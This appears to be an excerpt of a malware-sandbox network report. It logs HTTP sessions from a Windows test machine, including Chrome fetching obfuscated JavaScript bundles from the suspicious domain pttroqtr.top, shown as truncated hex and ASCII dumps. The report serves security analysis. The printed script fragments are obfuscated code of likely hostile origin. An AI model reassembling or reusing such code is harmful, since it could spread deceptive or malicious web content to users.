                                                                                                                                                                                            2024-09-28 03:39:23 UTC16384INData Raw: 30 64 29 3b 7d 6c 65 74 20 7a 73 3b 66 75 6e 63 74 69 6f 6e 20 57 61 28 5f 30 78 34 63 36 36 63 32 2c 5f 30 78 31 38 64 30 38 62 2c 5f 30 78 33 30 32 65 32 61 29 7b 76 61 72 20 5f 30 78 31 38 64 33 31 65 3d 61 33 38 5f 30 78 33 62 39 38 37 37 3b 63 6f 6e 73 74 20 5f 30 78 39 36 30 38 38 64 3d 5f 30 78 34 63 36 36 63 32 5b 27 74 79 70 65 27 5d 3b 69 66 28 21 5f 30 78 34 63 36 36 63 32 5b 5f 30 78 31 38 64 33 31 65 28 30 78 36 32 66 29 5d 29 7b 69 66 28 21 5f 30 78 31 38 64 30 38 62 26 26 7a 73 26 26 21 5f 30 78 39 36 30 38 38 64 5b 5f 30 78 31 38 64 33 31 65 28 30 78 36 32 66 29 5d 29 7b 63 6f 6e 73 74 20 5f 30 78 34 64 33 65 39 34 3d 5f 30 78 39 36 30 38 38 64 5b 27 74 65 6d 70 6c 61 74 65 27 5d 7c 7c 47 30 28 5f 30 78 34 63 36 36 63 32 29 5b 5f 30 78 31
                                                                                                                                                                                            Data Ascii: 0d);}let zs;function Wa(_0x4c66c2,_0x18d08b,_0x302e2a){var _0x18d31e=a38_0x3b9877;const _0x96088d=_0x4c66c2['type'];if(!_0x4c66c2[_0x18d31e(0x62f)]){if(!_0x18d08b&&zs&&!_0x96088d[_0x18d31e(0x62f)]){const _0x4d3e94=_0x96088d['template']||G0(_0x4c66c2)[_0x1


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            5192.168.2.549719184.28.90.27443
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            2024-09-28 03:39:23 UTC239OUTGET /fs/windows/config.json HTTP/1.1
                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                            Accept-Encoding: identity
                                                                                                                                                                                            If-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMT
                                                                                                                                                                                            Range: bytes=0-2147483646
                                                                                                                                                                                            User-Agent: Microsoft BITS/7.8
                                                                                                                                                                                            Host: fs.microsoft.com
                                                                                                                                                                                            2024-09-28 03:39:24 UTC515INHTTP/1.1 200 OK
                                                                                                                                                                                            ApiVersion: Distribute 1.1
                                                                                                                                                                                            Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json
                                                                                                                                                                                            Content-Type: application/octet-stream
                                                                                                                                                                                            ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7"
                                                                                                                                                                                            Last-Modified: Tue, 16 May 2017 22:58:00 GMT
                                                                                                                                                                                            Server: ECAcc (lpl/EF06)
                                                                                                                                                                                            X-CID: 11
                                                                                                                                                                                            X-Ms-ApiVersion: Distribute 1.2
                                                                                                                                                                                            X-Ms-Region: prod-weu-z1
                                                                                                                                                                                            Cache-Control: public, max-age=219968
                                                                                                                                                                                            Date: Sat, 28 Sep 2024 03:39:24 GMT
                                                                                                                                                                                            Content-Length: 55
                                                                                                                                                                                            Connection: close
                                                                                                                                                                                            X-CID: 2
                                                                                                                                                                                            2024-09-28 03:39:24 UTC55INData Raw: 7b 22 66 6f 6e 74 53 65 74 55 72 69 22 3a 22 66 6f 6e 74 73 65 74 2d 32 30 31 37 2d 30 34 2e 6a 73 6f 6e 22 2c 22 62 61 73 65 55 72 69 22 3a 22 66 6f 6e 74 73 22 7d
                                                                                                                                                                                            Data Ascii: {"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            6192.168.2.5497238.211.203.1654432584C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            2024-09-28 03:39:24 UTC532OUTGET /help/assets/77985128JxKnW.js HTTP/1.1
                                                                                                                                                                                            Host: pttroqtr.top
                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                            Origin: https://pttroqtr.top
                                                                                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                            Sec-Fetch-Site: same-origin
                                                                                                                                                                                            Sec-Fetch-Mode: cors
                                                                                                                                                                                            Sec-Fetch-Dest: script
                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                            2024-09-28 03:39:25 UTC361INHTTP/1.1 200 OK
                                                                                                                                                                                            Server: nginx/1.24.0
                                                                                                                                                                                            Date: Sat, 28 Sep 2024 03:39:25 GMT
                                                                                                                                                                                            Content-Type: application/javascript; charset=utf-8
                                                                                                                                                                                            Content-Length: 4708
                                                                                                                                                                                            Connection: close
                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                            Cache-Control: public, max-age=86400
                                                                                                                                                                                            Last-Modified: Wed, 29 May 2024 10:14:42 GMT
                                                                                                                                                                                            ETag: W/"1264-18fc3d84650"
                                                                                                                                                                                            2024-09-28 03:39:25 UTC4708INData Raw: 63 6f 6e 73 74 20 61 31 36 5f 30 78 31 61 30 61 62 31 3d 61 31 36 5f 30 78 62 33 30 39 3b 28 66 75 6e 63 74 69 6f 6e 28 5f 30 78 63 36 32 30 32 37 2c 5f 30 78 34 63 33 35 30 33 29 7b 63 6f 6e 73 74 20 5f 30 78 34 37 32 35 31 37 3d 61 31 36 5f 30 78 62 33 30 39 2c 5f 30 78 31 38 66 32 38 38 3d 5f 30 78 63 36 32 30 32 37 28 29 3b 77 68 69 6c 65 28 21 21 5b 5d 29 7b 74 72 79 7b 63 6f 6e 73 74 20 5f 30 78 31 30 61 36 34 62 3d 70 61 72 73 65 49 6e 74 28 5f 30 78 34 37 32 35 31 37 28 30 78 31 34 62 29 29 2f 30 78 31 2b 2d 70 61 72 73 65 49 6e 74 28 5f 30 78 34 37 32 35 31 37 28 30 78 31 33 66 29 29 2f 30 78 32 2b 70 61 72 73 65 49 6e 74 28 5f 30 78 34 37 32 35 31 37 28 30 78 31 32 64 29 29 2f 30 78 33 2b 2d 70 61 72 73 65 49 6e 74 28 5f 30 78 34 37 32 35 31 37
                                                                                                                                                                                            Data Ascii: const a16_0x1a0ab1=a16_0xb309;(function(_0xc62027,_0x4c3503){const _0x472517=a16_0xb309,_0x18f288=_0xc62027();while(!![]){try{const _0x10a64b=parseInt(_0x472517(0x14b))/0x1+-parseInt(_0x472517(0x13f))/0x2+parseInt(_0x472517(0x12d))/0x3+-parseInt(_0x472517


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            7192.168.2.5497248.211.203.1654432584C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            2024-09-28 03:39:24 UTC532OUTGET /help/assets/37d8eb31JxKnW.js HTTP/1.1
                                                                                                                                                                                            Host: pttroqtr.top
                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                            Origin: https://pttroqtr.top
                                                                                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                            Sec-Fetch-Site: same-origin
                                                                                                                                                                                            Sec-Fetch-Mode: cors
                                                                                                                                                                                            Sec-Fetch-Dest: script
                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                            2024-09-28 03:39:25 UTC362INHTTP/1.1 200 OK
                                                                                                                                                                                            Server: nginx/1.24.0
                                                                                                                                                                                            Date: Sat, 28 Sep 2024 03:39:25 GMT
                                                                                                                                                                                            Content-Type: application/javascript; charset=utf-8
                                                                                                                                                                                            Content-Length: 53104
                                                                                                                                                                                            Connection: close
                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                            Cache-Control: public, max-age=86400
                                                                                                                                                                                            Last-Modified: Wed, 29 May 2024 10:14:42 GMT
                                                                                                                                                                                            ETag: W/"cf70-18fc3d84650"
                                                                                                                                                                                            2024-09-28 03:39:25 UTC16022INData Raw: 63 6f 6e 73 74 20 61 39 5f 30 78 31 33 64 30 32 33 3d 61 39 5f 30 78 33 36 34 37 3b 28 66 75 6e 63 74 69 6f 6e 28 5f 30 78 31 63 30 66 34 63 2c 5f 30 78 35 62 34 66 37 65 29 7b 63 6f 6e 73 74 20 5f 30 78 31 38 63 30 65 33 3d 61 39 5f 30 78 33 36 34 37 2c 5f 30 78 33 35 64 30 39 63 3d 5f 30 78 31 63 30 66 34 63 28 29 3b 77 68 69 6c 65 28 21 21 5b 5d 29 7b 74 72 79 7b 63 6f 6e 73 74 20 5f 30 78 61 38 30 38 39 35 3d 2d 70 61 72 73 65 49 6e 74 28 5f 30 78 31 38 63 30 65 33 28 30 78 66 62 29 29 2f 30 78 31 2a 28 70 61 72 73 65 49 6e 74 28 5f 30 78 31 38 63 30 65 33 28 30 78 31 32 65 29 29 2f 30 78 32 29 2b 70 61 72 73 65 49 6e 74 28 5f 30 78 31 38 63 30 65 33 28 30 78 31 39 63 29 29 2f 30 78 33 2b 2d 70 61 72 73 65 49 6e 74 28 5f 30 78 31 38 63 30 65 33 28 30
                                                                                                                                                                                            Data Ascii: const a9_0x13d023=a9_0x3647;(function(_0x1c0f4c,_0x5b4f7e){const _0x18c0e3=a9_0x3647,_0x35d09c=_0x1c0f4c();while(!![]){try{const _0xa80895=-parseInt(_0x18c0e3(0xfb))/0x1*(parseInt(_0x18c0e3(0x12e))/0x2)+parseInt(_0x18c0e3(0x19c))/0x3+-parseInt(_0x18c0e3(0
                                                                                                                                                                                            2024-09-28 03:39:25 UTC16384INData Raw: 32 39 30 31 61 63 2c 27 70 61 72 73 65 27 3a 5f 30 78 35 33 38 35 38 36 2c 27 73 74 72 69 6e 67 69 66 79 27 3a 5f 30 78 33 30 39 36 33 33 7d 3b 7d 66 75 6e 63 74 69 6f 6e 20 50 74 28 5f 30 78 34 30 35 65 32 31 2c 5f 30 78 32 61 31 33 34 61 29 7b 63 6f 6e 73 74 20 5f 30 78 35 63 65 31 34 31 3d 61 39 5f 30 78 31 33 64 30 32 33 3b 6c 65 74 20 5f 30 78 35 65 35 37 31 62 3d 30 78 30 3b 66 6f 72 28 3b 5f 30 78 35 65 35 37 31 62 3c 5f 30 78 34 30 35 65 32 31 5b 5f 30 78 35 63 65 31 34 31 28 30 78 31 33 30 29 5d 26 26 5f 30 78 35 65 35 37 31 62 3c 5f 30 78 32 61 31 33 34 61 5b 5f 30 78 35 63 65 31 34 31 28 30 78 31 33 30 29 5d 3b 29 7b 63 6f 6e 73 74 20 5f 30 78 35 61 61 35 39 35 3d 5f 30 78 32 61 31 33 34 61 5b 5f 30 78 35 65 35 37 31 62 5d 2d 5f 30 78 34 30 35
                                                                                                                                                                                            Data Ascii: 2901ac,'parse':_0x538586,'stringify':_0x309633};}function Pt(_0x405e21,_0x2a134a){const _0x5ce141=a9_0x13d023;let _0x5e571b=0x0;for(;_0x5e571b<_0x405e21[_0x5ce141(0x130)]&&_0x5e571b<_0x2a134a[_0x5ce141(0x130)];){const _0x5aa595=_0x2a134a[_0x5e571b]-_0x405
                                                                                                                                                                                            2024-09-28 03:39:25 UTC16384INData Raw: 30 78 31 30 33 29 7c 7c 5f 30 78 39 38 62 34 63 33 28 30 78 31 32 61 29 2b 27 65 27 69 6e 20 5f 30 78 33 66 39 37 38 38 7c 7c 27 70 72 6f 70 73 27 69 6e 20 5f 30 78 33 66 39 37 38 38 7c 7c 5f 30 78 39 38 62 34 63 33 28 30 78 31 36 36 29 69 6e 20 5f 30 78 33 66 39 37 38 38 3b 7d 66 75 6e 63 74 69 6f 6e 20 4e 65 28 5f 30 78 33 63 61 34 37 36 29 7b 63 6f 6e 73 74 20 5f 30 78 32 62 36 33 33 33 3d 61 39 5f 30 78 31 33 64 30 32 33 2c 5f 30 78 31 61 66 61 33 64 3d 61 39 5f 30 78 33 65 36 30 61 34 28 65 65 29 2c 5f 30 78 32 38 35 39 35 32 3d 61 39 5f 30 78 33 65 36 30 61 34 28 67 65 29 2c 5f 30 78 31 39 35 63 34 33 3d 61 39 5f 30 78 32 65 65 33 64 31 28 28 29 3d 3e 5f 30 78 31 61 66 61 33 64 5b 27 72 65 73 6f 6c 76 65 27 5d 28 61 39 5f 30 78 31 66 33 62 30 36 28
                                                                                                                                                                                            Data Ascii: 0x103)||_0x98b4c3(0x12a)+'e'in _0x3f9788||'props'in _0x3f9788||_0x98b4c3(0x166)in _0x3f9788;}function Ne(_0x3ca476){const _0x2b6333=a9_0x13d023,_0x1afa3d=a9_0x3e60a4(ee),_0x285952=a9_0x3e60a4(ge),_0x195c43=a9_0x2ee3d1(()=>_0x1afa3d['resolve'](a9_0x1f3b06(
                                                                                                                                                                                            2024-09-28 03:39:25 UTC4314INData Raw: 32 31 32 63 5b 27 67 6f 27 5d 28 2d 5f 30 78 35 64 64 64 38 35 5b 27 64 65 6c 74 61 27 5d 2c 21 30 78 31 29 3a 5f 30 78 35 64 64 64 38 35 5b 5f 30 78 34 33 35 32 65 66 28 30 78 31 61 30 29 5d 3d 3d 3d 59 5b 5f 30 78 34 33 35 32 65 66 28 30 78 31 37 66 29 5d 26 26 49 28 5f 30 78 32 35 37 36 38 31 2c 30 78 31 34 29 26 26 5f 30 78 32 33 32 31 32 63 5b 27 67 6f 27 5d 28 2d 30 78 31 2c 21 30 78 31 29 29 2c 5f 30 78 31 64 63 61 62 30 28 5f 30 78 35 38 30 32 62 64 2c 5f 30 78 64 32 64 36 65 33 2c 5f 30 78 32 35 37 36 38 31 29 3b 7d 29 5b 5f 30 78 31 62 65 62 61 62 28 30 78 31 61 35 29 5d 28 57 29 3b 7d 29 29 3b 7d 6c 65 74 20 5f 30 78 33 30 31 63 32 31 3d 51 28 29 2c 5f 30 78 33 31 66 34 37 61 3d 51 28 29 2c 5f 30 78 37 34 33 34 30 32 3b 66 75 6e 63 74 69 6f 6e
                                                                                                                                                                                            Data Ascii: 212c['go'](-_0x5ddd85['delta'],!0x1):_0x5ddd85[_0x4352ef(0x1a0)]===Y[_0x4352ef(0x17f)]&&I(_0x257681,0x14)&&_0x23212c['go'](-0x1,!0x1)),_0x1dcab0(_0x5802bd,_0xd2d6e3,_0x257681);})[_0x1bebab(0x1a5)](W);}));}let _0x301c21=Q(),_0x31f47a=Q(),_0x743402;function


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            8192.168.2.5497228.211.203.1654432584C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            2024-09-28 03:39:24 UTC585OUTGET /favicon.ico HTTP/1.1
                                                                                                                                                                                            Host: pttroqtr.top
                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                                                                                            Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                            Sec-Fetch-Site: same-origin
                                                                                                                                                                                            Sec-Fetch-Mode: no-cors
                                                                                                                                                                                            Sec-Fetch-Dest: image
                                                                                                                                                                                            Referer: https://pttroqtr.top/help/
                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                            2024-09-28 03:39:25 UTC326INHTTP/1.1 200 OK
                                                                                                                                                                                            Server: nginx/1.24.0
                                                                                                                                                                                            Date: Sat, 28 Sep 2024 03:39:25 GMT
                                                                                                                                                                                            Content-Type: image/vnd.microsoft.icon
                                                                                                                                                                                            Content-Length: 15215
                                                                                                                                                                                            Connection: close
                                                                                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                            Cache-Control: public, max-age=86400
                                                                                                                                                                                            Last-Modified: Wed, 29 May 2024 10:14:36 GMT
                                                                                                                                                                                            ETag: W/"3b6f-18fc3d82ee0"
                                                                                                                                                                                            2024-09-28 03:39:25 UTC15215INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 02 4e 00 00 01 5f 08 06 00 00 00 b8 3b 43 56 00 00 00 01 73 52 47 42 00 ae ce 1c e9 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 00 09 70 48 59 73 00 00 2e 23 00 00 2e 23 01 78 a5 3f 76 00 00 00 19 74 45 58 74 53 6f 66 74 77 61 72 65 00 41 64 6f 62 65 20 49 6d 61 67 65 52 65 61 64 79 71 c9 65 3c 00 00 00 21 74 45 58 74 43 72 65 61 74 69 6f 6e 20 54 69 6d 65 00 32 30 31 38 3a 30 39 3a 30 37 20 30 39 3a 31 36 3a 30 36 44 2f 69 55 00 00 3a b2 49 44 41 54 78 5e ed dd cf 76 54 c7 d5 f7 f1 aa d3 b6 61 f6 38 57 00 99 07 68 0d 13 c8 8a 7c 05 96 27 59 30 8a 7c 05 b4 af c0 e2 0a 10 57 60 79 84 56 26 16 57 e0 f6 0a 24 43 35 90 79 c4 15 bc 78 06 d8 7d ea ad 5d 55 2d 09 a1 3f 7d fe 57 d5 f9 7e d6 b2 e1 b4
                                                                                                                                                                                            Data Ascii: PNGIHDRN_;CVsRGBgAMAapHYs.#.#x?vtEXtSoftwareAdobe ImageReadyqe<!tEXtCreation Time2018:09:07 09:16:06D/iU:IDATx^vTa8Wh|'Y0|W`yV&W$C5yx}]U-?}W~


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            9192.168.2.5497278.211.203.1654432584C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            2024-09-28 03:39:25 UTC365OUTGET /help/assets/index-f5457718.js HTTP/1.1
                                                                                                                                                                                            Host: pttroqtr.top
                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                            Sec-Fetch-Site: none
                                                                                                                                                                                            Sec-Fetch-Mode: cors
                                                                                                                                                                                            Sec-Fetch-Dest: empty
                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                            2024-09-28 03:39:26 UTC364INHTTP/1.1 200 OK
                                                                                                                                                                                            Server: nginx/1.24.0
                                                                                                                                                                                            Date: Sat, 28 Sep 2024 03:39:26 GMT
                                                                                                                                                                                            Content-Type: application/javascript; charset=utf-8
                                                                                                                                                                                            Content-Length: 504521
                                                                                                                                                                                            Connection: close
                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                            Cache-Control: public, max-age=86400
                                                                                                                                                                                            Last-Modified: Wed, 29 May 2024 10:14:46 GMT
                                                                                                                                                                                            ETag: W/"7b2c9-18fc3d855f0"
                                                                                                                                                                                            2024-09-28 03:39:26 UTC16020INData Raw: 76 61 72 20 61 33 38 5f 30 78 33 62 39 38 37 37 3d 61 33 38 5f 30 78 34 33 35 62 3b 28 66 75 6e 63 74 69 6f 6e 28 5f 30 78 34 35 31 35 31 66 2c 5f 30 78 35 34 39 63 64 62 29 7b 76 61 72 20 5f 30 78 39 65 61 31 62 66 3d 61 33 38 5f 30 78 34 33 35 62 2c 5f 30 78 32 31 38 63 33 62 3d 5f 30 78 34 35 31 35 31 66 28 29 3b 77 68 69 6c 65 28 21 21 5b 5d 29 7b 74 72 79 7b 76 61 72 20 5f 30 78 35 33 61 65 32 32 3d 2d 70 61 72 73 65 49 6e 74 28 5f 30 78 39 65 61 31 62 66 28 30 78 33 62 32 29 29 2f 30 78 31 2b 70 61 72 73 65 49 6e 74 28 5f 30 78 39 65 61 31 62 66 28 30 78 33 62 62 29 29 2f 30 78 32 2b 2d 70 61 72 73 65 49 6e 74 28 5f 30 78 39 65 61 31 62 66 28 30 78 34 63 38 29 29 2f 30 78 33 2a 28 2d 70 61 72 73 65 49 6e 74 28 5f 30 78 39 65 61 31 62 66 28 30 78 36
                                                                                                                                                                                            Data Ascii: var a38_0x3b9877=a38_0x435b;(function(_0x45151f,_0x549cdb){var _0x9ea1bf=a38_0x435b,_0x218c3b=_0x45151f();while(!![]){try{var _0x53ae22=-parseInt(_0x9ea1bf(0x3b2))/0x1+parseInt(_0x9ea1bf(0x3bb))/0x2+-parseInt(_0x9ea1bf(0x4c8))/0x3*(-parseInt(_0x9ea1bf(0x6
                                                                                                                                                                                            2024-09-28 03:39:26 UTC16384INData Raw: 31 66 38 3d 3e 50 6e 28 5f 30 78 33 64 32 31 66 38 29 5b 61 33 38 5f 30 78 33 62 39 38 37 37 28 30 78 36 31 62 29 5d 28 30 78 38 2c 2d 30 78 31 29 2c 51 69 3d 5f 30 78 35 64 62 36 62 65 3d 3e 50 6e 28 5f 30 78 35 64 62 36 62 65 29 3d 3d 3d 27 5b 6f 62 6a 65 63 74 5c 78 32 30 4f 62 27 2b 61 33 38 5f 30 78 33 62 39 38 37 37 28 30 78 34 37 30 29 2c 4e 30 3d 5f 30 78 33 35 33 66 63 62 3d 3e 42 65 28 5f 30 78 33 35 33 66 63 62 29 26 26 5f 30 78 33 35 33 66 63 62 21 3d 3d 27 4e 61 4e 27 26 26 5f 30 78 33 35 33 66 63 62 5b 30 78 30 5d 21 3d 3d 27 2d 27 26 26 27 27 2b 70 61 72 73 65 49 6e 74 28 5f 30 78 33 35 33 66 63 62 2c 30 78 61 29 3d 3d 3d 5f 30 78 33 35 33 66 63 62 2c 54 72 3d 54 30 28 61 33 38 5f 30 78 33 62 39 38 37 37 28 30 78 33 37 34 29 2b 61 33 38 5f
                                                                                                                                                                                            Data Ascii: 1f8=>Pn(_0x3d21f8)[a38_0x3b9877(0x61b)](0x8,-0x1),Qi=_0x5db6be=>Pn(_0x5db6be)==='[object\x20Ob'+a38_0x3b9877(0x470),N0=_0x353fcb=>Be(_0x353fcb)&&_0x353fcb!=='NaN'&&_0x353fcb[0x0]!=='-'&&''+parseInt(_0x353fcb,0xa)===_0x353fcb,Tr=T0(a38_0x3b9877(0x374)+a38_
                                                                                                                                                                                            2024-09-28 03:39:26 UTC16384INData Raw: 55 52 4c 53 65 61 72 63 27 2c 27 70 6f 72 74 65 64 5c 78 32 30 62 79 5c 78 32 30 27 2c 27 3d 5c 78 32 32 33 5c 78 32 32 5c 78 32 30 72 79 3d 5c 78 32 32 36 27 2c 27 5f 62 6c 6f 63 6b 73 27 2c 27 6b 65 79 53 69 7a 65 27 2c 27 41 4c 50 48 41 5f 44 49 47 49 27 2c 27 5f 78 66 6f 72 6d 4d 6f 64 65 27 2c 27 6f 64 69 6e 67 27 2c 27 6f 72 74 65 64 27 2c 27 72 6d 3d 5c 78 32 32 72 6f 74 61 74 65 27 2c 27 67 65 74 53 65 6c 65 63 74 69 27 2c 27 5c 78 32 30 62 65 67 69 6e 3d 5c 78 32 32 2d 30 27 2c 27 53 50 4f 4e 53 45 27 2c 27 73 69 67 42 79 74 65 73 27 2c 27 72 43 68 61 72 27 2c 27 6f 6e 61 6c 5c 78 32 30 6f 70 74 69 6f 27 2c 27 5c 78 32 30 3c 2f 67 3e 3c 67 5c 78 32 30 74 72 27 2c 27 64 61 74 61 5c 78 32 30 6d 75 73 74 5c 78 32 30 27 2c 27 5c 78 35 63 64 2a 27 2c
                                                                                                                                                                                            Data Ascii: URLSearc','ported\x20by\x20','=\x223\x22\x20ry=\x226','_blocks','keySize','ALPHA_DIGI','_xformMode','oding','orted','rm=\x22rotate','getSelecti','\x20begin=\x22-0','SPONSE','sigBytes','rChar','onal\x20optio','\x20</g><g\x20tr','data\x20must\x20','\x5cd*',
                                                                                                                                                                                            2024-09-28 03:39:26 UTC16384INData Raw: 33 33 33 33 33 33 33 33 73 5c 78 32 32 27 2c 27 6d 3d 5c 78 32 32 72 6f 74 61 74 65 28 27 2c 27 53 79 6e 74 61 78 45 72 72 6f 27 2c 27 63 68 61 72 43 6f 64 65 41 74 27 2c 27 5c 78 32 32 72 6f 74 61 74 65 28 30 5c 78 32 30 27 2c 27 68 65 61 64 65 72 73 27 2c 27 74 3e 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 3c 2f 67 27 2c 27 5c 78 32 30 5b 6c 64 69 6f 5d 5c 78 32 30 67 65 27 2c 27 65 6e 63 72 79 70 74 27 2c 27 5f 5f 69 73 54 65 6c 65 70 6f 27 2c 27 72 61 77 49 6e 73 65 72 74 65 27 2c 27 2e 77 33 2e 6f 72 67 2f 32 30 27 2c 27 70 61 64 64 69 6e 67 27 2c 27 5c 78 32 30 6e 6f 6e 2d 69 74 65 72 61 27 2c 27 24 73 74 61 74 65 27 2c 27 70 6f 77 27 2c 27 66 6f 63 75 73 4f 66 66 73 65 27 2c 27 5f 62 69 6e 64 45 76 65 6e 74 27 2c 27 5f 63 72 65 61
                                                                                                                                                                                            Data Ascii: 33333333s\x22','m=\x22rotate(','SyntaxErro','charCodeAt','\x22rotate(0\x20','headers','t>\x0a\x20\x20\x20\x20</g','\x20[ldio]\x20ge','encrypt','__isTelepo','rawInserte','.w3.org/20','padding','\x20non-itera','$state','pow','focusOffse','_bindEvent','_crea
                                                                                                                                                                                            2024-09-28 03:39:26 UTC16384INData Raw: 31 29 3b 63 6f 6e 73 74 20 5f 30 78 34 33 33 33 32 36 3d 24 72 28 5f 30 78 31 32 32 63 36 61 29 3b 6c 65 74 20 5f 30 78 34 65 35 62 37 65 3b 74 72 79 7b 5f 30 78 34 65 35 62 37 65 3d 5f 30 78 37 38 62 33 36 33 28 2e 2e 2e 5f 30 78 63 39 39 30 38 61 29 3b 7d 66 69 6e 61 6c 6c 79 7b 24 72 28 5f 30 78 34 33 33 33 32 36 29 2c 5f 30 78 31 33 36 32 34 38 5b 27 5f 64 27 5d 26 26 6a 73 28 30 78 31 29 3b 7d 72 65 74 75 72 6e 20 5f 30 78 34 65 35 62 37 65 3b 7d 3b 72 65 74 75 72 6e 20 5f 30 78 31 33 36 32 34 38 5b 27 5f 6e 27 5d 3d 21 30 78 30 2c 5f 30 78 31 33 36 32 34 38 5b 27 5f 63 27 5d 3d 21 30 78 30 2c 5f 30 78 31 33 36 32 34 38 5b 27 5f 64 27 5d 3d 21 30 78 30 2c 5f 30 78 31 33 36 32 34 38 3b 7d 66 75 6e 63 74 69 6f 6e 20 65 30 28 5f 30 78 35 62 37 32 39 64
                                                                                                                                                                                            Data Ascii: 1);const _0x433326=$r(_0x122c6a);let _0x4e5b7e;try{_0x4e5b7e=_0x78b363(..._0xc9908a);}finally{$r(_0x433326),_0x136248['_d']&&js(0x1);}return _0x4e5b7e;};return _0x136248['_n']=!0x0,_0x136248['_c']=!0x0,_0x136248['_d']=!0x0,_0x136248;}function e0(_0x5b729d
